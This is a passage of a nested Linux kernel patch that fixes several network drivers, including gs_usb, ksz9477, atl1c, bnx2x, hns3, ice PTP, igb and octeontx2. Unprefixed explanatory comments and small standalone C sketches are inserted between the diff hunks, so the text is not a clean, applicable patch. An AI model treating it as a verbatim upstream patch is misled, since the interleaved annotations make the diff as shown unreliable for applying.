++		stats->rx_errors++;
++
+ 		skb = alloc_can_err_skb(netdev, &cf);
+ 		if (!skb)
+ 			goto resubmit_urb;
+@@ -633,8 +636,6 @@ static void gs_usb_receive_bulk_callback(struct urb *urb)
+ 		cf->can_id |= CAN_ERR_CRTL;
+ 		cf->len = CAN_ERR_DLC;
+ 		cf->data[1] = CAN_ERR_CRTL_RX_OVERFLOW;
+-		stats->rx_over_errors++;
+-		stats->rx_errors++;
+ 		netif_rx(skb);
+ 	}
+ 
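[Editorial note] The gs_usb hunk bumps rx_over_errors/rx_errors before attempting the error-skb allocation, so the counters stay accurate even when the allocation fails. A sketch of the reordering under invented names:

#include <stdio.h>

struct stats { unsigned long rx_over_errors, rx_errors; };

static void handle_overflow(struct stats *st, int alloc_fails)
{
	/* The fix: account the overflow first, so the counters are
	 * correct even if building the error frame fails below. */
	st->rx_over_errors++;
	st->rx_errors++;

	if (alloc_fails)
		return;		/* skb allocation failed; stats already updated */

	/* ... build and deliver the error frame here ... */
}

int main(void)
{
	struct stats st = { 0, 0 };

	handle_overflow(&st, 1);
	printf("over=%lu errors=%lu\n", st.rx_over_errors, st.rx_errors);
	return 0;
}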
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 8c492d56d2c36..dc9eea3c8ab16 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -590,10 +590,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x1030, 0x1030),
+ 	regmap_reg_range(0x1100, 0x1115),
+ 	regmap_reg_range(0x111a, 0x111f),
+-	regmap_reg_range(0x1122, 0x1127),
+-	regmap_reg_range(0x112a, 0x112b),
+-	regmap_reg_range(0x1136, 0x1139),
+-	regmap_reg_range(0x113e, 0x113f),
++	regmap_reg_range(0x1120, 0x112b),
++	regmap_reg_range(0x1134, 0x113b),
++	regmap_reg_range(0x113c, 0x113f),
+ 	regmap_reg_range(0x1400, 0x1401),
+ 	regmap_reg_range(0x1403, 0x1403),
+ 	regmap_reg_range(0x1410, 0x1417),
+@@ -624,10 +623,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x2030, 0x2030),
+ 	regmap_reg_range(0x2100, 0x2115),
+ 	regmap_reg_range(0x211a, 0x211f),
+-	regmap_reg_range(0x2122, 0x2127),
+-	regmap_reg_range(0x212a, 0x212b),
+-	regmap_reg_range(0x2136, 0x2139),
+-	regmap_reg_range(0x213e, 0x213f),
++	regmap_reg_range(0x2120, 0x212b),
++	regmap_reg_range(0x2134, 0x213b),
++	regmap_reg_range(0x213c, 0x213f),
+ 	regmap_reg_range(0x2400, 0x2401),
+ 	regmap_reg_range(0x2403, 0x2403),
+ 	regmap_reg_range(0x2410, 0x2417),
+@@ -658,10 +656,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x3030, 0x3030),
+ 	regmap_reg_range(0x3100, 0x3115),
+ 	regmap_reg_range(0x311a, 0x311f),
+-	regmap_reg_range(0x3122, 0x3127),
+-	regmap_reg_range(0x312a, 0x312b),
+-	regmap_reg_range(0x3136, 0x3139),
+-	regmap_reg_range(0x313e, 0x313f),
++	regmap_reg_range(0x3120, 0x312b),
++	regmap_reg_range(0x3134, 0x313b),
++	regmap_reg_range(0x313c, 0x313f),
+ 	regmap_reg_range(0x3400, 0x3401),
+ 	regmap_reg_range(0x3403, 0x3403),
+ 	regmap_reg_range(0x3410, 0x3417),
+@@ -692,10 +689,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x4030, 0x4030),
+ 	regmap_reg_range(0x4100, 0x4115),
+ 	regmap_reg_range(0x411a, 0x411f),
+-	regmap_reg_range(0x4122, 0x4127),
+-	regmap_reg_range(0x412a, 0x412b),
+-	regmap_reg_range(0x4136, 0x4139),
+-	regmap_reg_range(0x413e, 0x413f),
++	regmap_reg_range(0x4120, 0x412b),
++	regmap_reg_range(0x4134, 0x413b),
++	regmap_reg_range(0x413c, 0x413f),
+ 	regmap_reg_range(0x4400, 0x4401),
+ 	regmap_reg_range(0x4403, 0x4403),
+ 	regmap_reg_range(0x4410, 0x4417),
+@@ -726,10 +722,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x5030, 0x5030),
+ 	regmap_reg_range(0x5100, 0x5115),
+ 	regmap_reg_range(0x511a, 0x511f),
+-	regmap_reg_range(0x5122, 0x5127),
+-	regmap_reg_range(0x512a, 0x512b),
+-	regmap_reg_range(0x5136, 0x5139),
+-	regmap_reg_range(0x513e, 0x513f),
++	regmap_reg_range(0x5120, 0x512b),
++	regmap_reg_range(0x5134, 0x513b),
++	regmap_reg_range(0x513c, 0x513f),
+ 	regmap_reg_range(0x5400, 0x5401),
+ 	regmap_reg_range(0x5403, 0x5403),
+ 	regmap_reg_range(0x5410, 0x5417),
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+index 40c781695d581..7762e532c6a4f 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+@@ -2104,8 +2104,11 @@ static int atl1c_tso_csum(struct atl1c_adapter *adapter,
+ 			real_len = (((unsigned char *)ip_hdr(skb) - skb->data)
+ 					+ ntohs(ip_hdr(skb)->tot_len));
+ 
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (unlikely(skb->len == hdr_len)) {
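
The atl1c hunk above stops ignoring the return value of pskb_trim(): when the trim fails, the old length is still in effect and the caller must bail out. A minimal standalone sketch of the same pattern, with buf_trim() standing in for pskb_trim() (not a kernel API):

#include <stdio.h>
#include <stdlib.h>

struct buf { unsigned char *data; size_t len; };

static int buf_trim(struct buf *b, size_t new_len)
{
	unsigned char *p;

	if (new_len > b->len)
		return -1;
	p = realloc(b->data, new_len ? new_len : 1);
	if (!p)
		return -1;	/* trim failed; b->len was never updated */
	b->data = p;
	b->len = new_len;
	return 0;
}

int main(void)
{
	struct buf b = { .data = malloc(100), .len = 100 };
	size_t real_len = 60;
	int err = 0;

	if (real_len < b.len) {
		err = buf_trim(&b, real_len);
		if (err) {		/* the fixed driver code returns here */
			free(b.data);
			return 1;
		}
	}
	printf("len=%zu\n", b.len);
	free(b.data);
	return err;
}
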
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
+index 51b1690fd0459..a1783faf4fe99 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
+@@ -14312,11 +14312,16 @@ static void bnx2x_io_resume(struct pci_dev *pdev)
+ 	bp->fw_seq = SHMEM_RD(bp, func_mb[BP_FW_MB_IDX(bp)].drv_mb_header) &
+ 							DRV_MSG_SEQ_NUMBER_MASK;
+ 
+-	if (netif_running(dev))
+-		bnx2x_nic_load(bp, LOAD_NORMAL);
++	if (netif_running(dev)) {
++		if (bnx2x_nic_load(bp, LOAD_NORMAL)) {
++			netdev_err(bp->dev, "Error during driver initialization, try unloading/reloading the driver\n");
++			goto done;
++		}
++	}
+ 
+ 	netif_device_attach(dev);
+ 
++done:
+ 	rtnl_unlock();
+ }
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 6af2273f227c2..84ecd8b9be48c 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -10936,9 +10936,12 @@ int hclge_cfg_flowctrl(struct hclge_dev *hdev)
+ 	u32 rx_pause, tx_pause;
+ 	u8 flowctl;
+ 
+-	if (!phydev->link || !phydev->autoneg)
++	if (!phydev->link)
+ 		return 0;
+ 
++	if (!phydev->autoneg)
++		return hclge_mac_pause_setup_hw(hdev);
++
+ 	local_advertising = linkmode_adv_to_lcl_adv_t(phydev->advertising);
+ 
+ 	if (phydev->pause)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 150f146fa24fb..8b40c6b4ee53e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -1549,7 +1549,7 @@ static int hclge_bp_setup_hw(struct hclge_dev *hdev, u8 tc)
+ 	return 0;
+ }
+ 
+-static int hclge_mac_pause_setup_hw(struct hclge_dev *hdev)
++int hclge_mac_pause_setup_hw(struct hclge_dev *hdev)
+ {
+ 	bool tx_en, rx_en;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+index dd6f1fd486cf2..251e808456208 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+@@ -242,6 +242,7 @@ int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
+ 			   u8 pfc_bitmap);
+ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx);
+ int hclge_pause_addr_cfg(struct hclge_dev *hdev, const u8 *mac_addr);
++int hclge_mac_pause_setup_hw(struct hclge_dev *hdev);
+ void hclge_pfc_rx_stats_get(struct hclge_dev *hdev, u64 *stats);
+ void hclge_pfc_tx_stats_get(struct hclge_dev *hdev, u64 *stats);
+ int hclge_tm_qs_shaper_cfg(struct hclge_vport *vport, int max_tx_rate);
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 7a00d297be3a9..3f98781e74b28 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -1356,6 +1356,7 @@ int ice_aq_wait_for_event(struct ice_pf *pf, u16 opcode, unsigned long timeout,
+ static void ice_aq_check_events(struct ice_pf *pf, u16 opcode,
+ 				struct ice_rq_event_info *event)
+ {
++	struct ice_rq_event_info *task_ev;
+ 	struct ice_aq_task *task;
+ 	bool found = false;
+ 
+@@ -1364,15 +1365,15 @@ static void ice_aq_check_events(struct ice_pf *pf, u16 opcode,
+ 		if (task->state || task->opcode != opcode)
+ 			continue;
+ 
+-		memcpy(&task->event->desc, &event->desc, sizeof(event->desc));
+-		task->event->msg_len = event->msg_len;
++		task_ev = task->event;
++		memcpy(&task_ev->desc, &event->desc, sizeof(event->desc));
++		task_ev->msg_len = event->msg_len;
+ 
+ 		/* Only copy the data buffer if a destination was set */
+-		if (task->event->msg_buf &&
+-		    task->event->buf_len > event->buf_len) {
+-			memcpy(task->event->msg_buf, event->msg_buf,
++		if (task_ev->msg_buf && task_ev->buf_len >= event->buf_len) {
++			memcpy(task_ev->msg_buf, event->msg_buf,
+ 			       event->buf_len);
+-			task->event->buf_len = event->buf_len;
++			task_ev->buf_len = event->buf_len;
+ 		}
+ 
+ 		task->state = ICE_AQ_TASK_COMPLETE;
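
The ice_aq_check_events hunk above also relaxes the copy guard from a strict '>' to '>=': a destination exactly as large as the message is big enough. A standalone sketch of that guard (illustrative names only):

#include <stdio.h>
#include <string.h>

static size_t copy_msg(char *dst, size_t dst_cap,
		       const char *src, size_t src_len)
{
	/* copy only when a destination was set and it can hold the data */
	if (dst && dst_cap >= src_len) {
		memcpy(dst, src, src_len);
		return src_len;
	}
	return 0;	/* no destination, or it is too small */
}

int main(void)
{
	char dst[16];
	const char msg[16] = "0123456789abcde";

	/* equal sizes now copy; with '>' this wrongly returned 0 */
	printf("copied=%zu\n", copy_msg(dst, sizeof(dst), msg, sizeof(msg)));
	return 0;
}
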
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
+index 772b1f566d6ed..813acd6a4b469 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
+@@ -131,6 +131,8 @@ static void ice_ptp_src_cmd(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	case READ_TIME:
+ 		cmd_val |= GLTSYN_CMD_READ_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		break;
+ 	}
+ 
+ 	wr32(hw, GLTSYN_CMD, cmd_val);
+@@ -1200,18 +1202,18 @@ ice_ptp_read_port_capture(struct ice_hw *hw, u8 port, u64 *tx_ts, u64 *rx_ts)
+ }
+ 
+ /**
+- * ice_ptp_one_port_cmd - Prepare a single PHY port for a timer command
++ * ice_ptp_write_port_cmd_e822 - Prepare a single PHY port for a timer command
+  * @hw: pointer to HW struct
+  * @port: Port to which cmd has to be sent
+  * @cmd: Command to be sent to the port
+  *
+  * Prepare the requested port for an upcoming timer sync command.
+  *
+- * Note there is no equivalent of this operation on E810, as that device
+- * always handles all external PHYs internally.
++ * Do not use this function directly. If you want to configure exactly one
++ * port, use ice_ptp_one_port_cmd() instead.
+  */
+ static int
+-ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
++ice_ptp_write_port_cmd_e822(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ {
+ 	u32 cmd_val, val;
+ 	u8 tmr_idx;
+@@ -1235,6 +1237,8 @@ ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ 	case ADJ_TIME_AT_TIME:
+ 		cmd_val |= PHY_CMD_ADJ_TIME_AT_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		break;
+ 	}
+ 
+ 	/* Tx case */
+@@ -1280,6 +1284,39 @@ ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ 	return 0;
+ }
+ 
++/**
++ * ice_ptp_one_port_cmd - Prepare one port for a timer command
++ * @hw: pointer to the HW struct
++ * @configured_port: the port to configure with configured_cmd
++ * @configured_cmd: timer command to prepare on the configured_port
++ *
++ * Prepare the configured_port for the configured_cmd, and prepare all other
++ * ports for ICE_PTP_NOP. This causes the configured_port to execute the
++ * desired command while all other ports perform no operation.
++ */
++static int
++ice_ptp_one_port_cmd(struct ice_hw *hw, u8 configured_port,
++		     enum ice_ptp_tmr_cmd configured_cmd)
++{
++	u8 port;
++
++	for (port = 0; port < ICE_NUM_EXTERNAL_PORTS; port++) {
++		enum ice_ptp_tmr_cmd cmd;
++		int err;
++
++		if (port == configured_port)
++			cmd = configured_cmd;
++		else
++			cmd = ICE_PTP_NOP;
++
++		err = ice_ptp_write_port_cmd_e822(hw, port, cmd);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
+ /**
+  * ice_ptp_port_cmd_e822 - Prepare all ports for a timer command
+  * @hw: pointer to the HW struct
+@@ -1296,7 +1333,7 @@ ice_ptp_port_cmd_e822(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	for (port = 0; port < ICE_NUM_EXTERNAL_PORTS; port++) {
+ 		int err;
+ 
+-		err = ice_ptp_one_port_cmd(hw, port, cmd);
++		err = ice_ptp_write_port_cmd_e822(hw, port, cmd);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -2245,6 +2282,9 @@ static int ice_sync_phy_timer_e822(struct ice_hw *hw, u8 port)
+ 	if (err)
+ 		goto err_unlock;
+ 
++	/* Do not perform any action on the main timer */
++	ice_ptp_src_cmd(hw, ICE_PTP_NOP);
++
+ 	/* Issue the sync to activate the time adjustment */
+ 	ice_ptp_exec_tmr_cmd(hw);
+ 
+@@ -2371,6 +2411,9 @@ ice_start_phy_timer_e822(struct ice_hw *hw, u8 port, bool bypass)
+ 	if (err)
+ 		return err;
+ 
++	/* Do not perform any action on the main timer */
++	ice_ptp_src_cmd(hw, ICE_PTP_NOP);
++
+ 	ice_ptp_exec_tmr_cmd(hw);
+ 
+ 	err = ice_read_phy_reg_e822(hw, port, P_REG_PS, &val);
+@@ -2914,6 +2957,8 @@ static int ice_ptp_port_cmd_e810(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	case ADJ_TIME_AT_TIME:
+ 		cmd_val = GLTSYN_CMD_ADJ_INIT_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		return 0;
+ 	}
+ 
+ 	/* Read, modify, write */
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.h b/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
+index 2bda64c76abc3..071f545aa85e8 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
++++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
+@@ -9,7 +9,8 @@ enum ice_ptp_tmr_cmd {
+ 	INIT_INCVAL,
+ 	ADJ_TIME,
+ 	ADJ_TIME_AT_TIME,
+-	READ_TIME
++	READ_TIME,
++	ICE_PTP_NOP,
+ };
+ 
+ enum ice_ptp_serdes {
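
The new ICE_PTP_NOP enumerator above lets the driver program one port with a real timer command while every other port is explicitly told to do nothing, and an explicit case in each switch keeps -Wswitch exhaustive. A standalone C sketch of that pattern (enum and bit values are made up, not the driver's):

#include <stdio.h>

enum tmr_cmd { INIT_TIME, ADJ_TIME, READ_TIME, TMR_NOP };

static unsigned int cmd_bits(enum tmr_cmd cmd)
{
	unsigned int val = 0;

	switch (cmd) {
	case INIT_TIME: val |= 0x1; break;
	case ADJ_TIME:  val |= 0x2; break;
	case READ_TIME: val |= 0x4; break;
	case TMR_NOP:   break;	/* program no operation */
	}
	return val;
}

int main(void)
{
	unsigned int port;

	/* mirror ice_ptp_one_port_cmd(): one configured port, NOP elsewhere */
	for (port = 0; port < 4; port++) {
		enum tmr_cmd cmd = (port == 2) ? ADJ_TIME : TMR_NOP;
		printf("port %u -> 0x%x\n", port, cmd_bits(cmd));
	}
	return 0;
}
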
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 3e0444354632d..d0ead18ec0266 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -4758,6 +4758,10 @@ void igb_configure_rx_ring(struct igb_adapter *adapter,
+ static void igb_set_rx_buffer_len(struct igb_adapter *adapter,
+ 				  struct igb_ring *rx_ring)
+ {
++#if (PAGE_SIZE < 8192)
++	struct e1000_hw *hw = &adapter->hw;
++#endif
++
+ 	/* set build_skb and buffer size flags */
+ 	clear_ring_build_skb_enabled(rx_ring);
+ 	clear_ring_uses_large_buffer(rx_ring);
+@@ -4768,10 +4772,9 @@ static void igb_set_rx_buffer_len(struct igb_adapter *adapter,
+ 	set_ring_build_skb_enabled(rx_ring);
+ 
+ #if (PAGE_SIZE < 8192)
+-	if (adapter->max_frame_size <= IGB_MAX_FRAME_BUILD_SKB)
+-		return;
+-
+-	set_ring_uses_large_buffer(rx_ring);
++	if (adapter->max_frame_size > IGB_MAX_FRAME_BUILD_SKB ||
++	    rd32(E1000_RCTL) & E1000_RCTL_SBP)
++		set_ring_uses_large_buffer(rx_ring);
+ #endif
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 5541e284cd3f0..c85e0180d96da 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -1691,6 +1691,42 @@ exit:
+ 	return true;
+ }
+ 
++static void nix_reset_tx_schedule(struct rvu *rvu, int blkaddr,
++				  int lvl, int schq)
++{
++	u64 tlx_parent = 0, tlx_schedule = 0;
++
++	switch (lvl) {
++	case NIX_TXSCH_LVL_TL2:
++		tlx_parent   = NIX_AF_TL2X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL2X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_TL3:
++		tlx_parent   = NIX_AF_TL3X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL3X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_TL4:
++		tlx_parent   = NIX_AF_TL4X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL4X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_MDQ:
++		/* no need to reset SMQ_CFG as HW clears this CSR
++		 * on SMQ flush
++		 */
++		tlx_parent   = NIX_AF_MDQX_PARENT(schq);
++		tlx_schedule = NIX_AF_MDQX_SCHEDULE(schq);
++		break;
++	default:
++		return;
++	}
++
++	if (tlx_parent)
++		rvu_write64(rvu, blkaddr, tlx_parent, 0x0);
++
++	if (tlx_schedule)
++		rvu_write64(rvu, blkaddr, tlx_schedule, 0x0);
++}
++
+ /* Disable shaping of pkts by a scheduler queue
+  * at a given scheduler level.
+  */
+@@ -2040,6 +2076,7 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 				pfvf_map[schq] = TXSCH_MAP(pcifunc, 0);
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 		}
+ 
+ 		for (idx = 0; idx < req->schq[lvl]; idx++) {
+@@ -2049,6 +2086,7 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 				pfvf_map[schq] = TXSCH_MAP(pcifunc, 0);
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 		}
+ 	}
+ 
+@@ -2137,6 +2175,7 @@ static int nix_txschq_free(struct rvu *rvu, u16 pcifunc)
+ 				continue;
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_clear_tx_xoff(rvu, blkaddr, lvl, schq);
++			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
+ 		}
+ 	}
+ 	nix_clear_tx_xoff(rvu, blkaddr, NIX_TXSCH_LVL_TL1,
+@@ -2175,6 +2214,7 @@ static int nix_txschq_free(struct rvu *rvu, u16 pcifunc)
+ 		for (schq = 0; schq < txsch->schq.max; schq++) {
+ 			if (TXSCH_MAP_FUNC(txsch->pfvf_map[schq]) != pcifunc)
+ 				continue;
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 			rvu_free_rsrc(&txsch->schq, schq);
+ 			txsch->pfvf_map[schq] = TXSCH_MAP(0, NIX_TXSCHQ_FREE);
+ 		}
+@@ -2234,6 +2274,9 @@ static int nix_txschq_free_one(struct rvu *rvu,
+ 	 */
+ 	nix_clear_tx_xoff(rvu, blkaddr, lvl, schq);
+ 
++	nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
++	nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++
+ 	/* Flush if it is a SMQ. Onus of disabling
+ 	 * TL2/3 queue links before SMQ flush is on user
+ 	 */
+@@ -2243,6 +2286,8 @@ static int nix_txschq_free_one(struct rvu *rvu,
+ 		goto err;
+ 	}
+ 
++	nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
++
+ 	/* Free the resource */
+ 	rvu_free_rsrc(&txsch->schq, schq);
+ 	txsch->pfvf_map[schq] = TXSCH_MAP(0, NIX_TXSCHQ_FREE);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 8a41ad8ca04f1..011355e73696e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -716,7 +716,8 @@ EXPORT_SYMBOL(otx2_smq_flush);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf)
+ {
+ 	struct nix_txsch_alloc_req *req;
+-	int lvl;
++	struct nix_txsch_alloc_rsp *rsp;
++	int lvl, schq, rc;
+ 
+ 	/* Get memory to put this msg */
+ 	req = otx2_mbox_alloc_msg_nix_txsch_alloc(&pfvf->mbox);
+@@ -726,33 +727,69 @@ int otx2_txsch_alloc(struct otx2_nic *pfvf)
+ 	/* Request one schq per level */
+ 	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
+ 		req->schq[lvl] = 1;
++	rc = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (rc)
++		return rc;
+ 
+-	return otx2_sync_mbox_msg(&pfvf->mbox);
++	rsp = (struct nix_txsch_alloc_rsp *)
++	      otx2_mbox_get_rsp(&pfvf->mbox.mbox, 0, &req->hdr);
++	if (IS_ERR(rsp))
++		return PTR_ERR(rsp);
++
++	/* Setup transmit scheduler list */
++	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
++		for (schq = 0; schq < rsp->schq[lvl]; schq++)
++			pfvf->hw.txschq_list[lvl][schq] =
++				rsp->schq_list[lvl][schq];
++
++	pfvf->hw.txschq_link_cfg_lvl = rsp->link_cfg_lvl;
++
++	return 0;
+ }
+ 
+-int otx2_txschq_stop(struct otx2_nic *pfvf)
++void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq)
+ {
+ 	struct nix_txsch_free_req *free_req;
+-	int lvl, schq, err;
++	int err;
+ 
+ 	mutex_lock(&pfvf->mbox.lock);
+-	/* Free the transmit schedulers */
++
+ 	free_req = otx2_mbox_alloc_msg_nix_txsch_free(&pfvf->mbox);
+ 	if (!free_req) {
+ 		mutex_unlock(&pfvf->mbox.lock);
+-		return -ENOMEM;
++		netdev_err(pfvf->netdev,
++			   "Failed alloc txschq free req\n");
++		return;
+ 	}
+ 
+-	free_req->flags = TXSCHQ_FREE_ALL;
++	free_req->schq_lvl = lvl;
++	free_req->schq = schq;
++
+ 	err = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (err) {
++		netdev_err(pfvf->netdev,
++			   "Failed stop txschq %d at level %d\n", schq, lvl);
++	}
++
+ 	mutex_unlock(&pfvf->mbox.lock);
++}
++EXPORT_SYMBOL(otx2_txschq_free_one);
++
++void otx2_txschq_stop(struct otx2_nic *pfvf)
++{
++	int lvl, schq;
++
++	/* free non QOS TLx nodes */
++	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
++		otx2_txschq_free_one(pfvf, lvl,
++				     pfvf->hw.txschq_list[lvl][0]);
+ 
+ 	/* Clear the txschq list */
+ 	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++) {
+ 		for (schq = 0; schq < MAX_TXSCHQ_PER_FUNC; schq++)
+ 			pfvf->hw.txschq_list[lvl][schq] = 0;
+ 	}
+-	return err;
++
+ }
+ 
+ void otx2_sqb_flush(struct otx2_nic *pfvf)
+@@ -1629,21 +1666,6 @@ void mbox_handler_cgx_fec_stats(struct otx2_nic *pfvf,
+ 	pfvf->hw.cgx_fec_uncorr_blks += rsp->fec_uncorr_blks;
+ }
+ 
+-void mbox_handler_nix_txsch_alloc(struct otx2_nic *pf,
+-				  struct nix_txsch_alloc_rsp *rsp)
+-{
+-	int lvl, schq;
+-
+-	/* Setup transmit scheduler list */
+-	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
+-		for (schq = 0; schq < rsp->schq[lvl]; schq++)
+-			pf->hw.txschq_list[lvl][schq] =
+-				rsp->schq_list[lvl][schq];
+-
+-	pf->hw.txschq_link_cfg_lvl = rsp->link_cfg_lvl;
+-}
+-EXPORT_SYMBOL(mbox_handler_nix_txsch_alloc);
+-
+ void mbox_handler_npa_lf_alloc(struct otx2_nic *pfvf,
+ 			       struct npa_lf_alloc_rsp *rsp)
+ {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 241016ca64d05..8a9793b06769f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -917,7 +917,8 @@ int otx2_config_nix(struct otx2_nic *pfvf);
+ int otx2_config_nix_queues(struct otx2_nic *pfvf);
+ int otx2_txschq_config(struct otx2_nic *pfvf, int lvl, int prio, bool pfc_en);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf);
+-int otx2_txschq_stop(struct otx2_nic *pfvf);
++void otx2_txschq_stop(struct otx2_nic *pfvf);
++void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq);
+ void otx2_sqb_flush(struct otx2_nic *pfvf);
+ int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+ 		      dma_addr_t *dma);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+index ccaf97bb1ce03..bfddbff7bcdfb 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
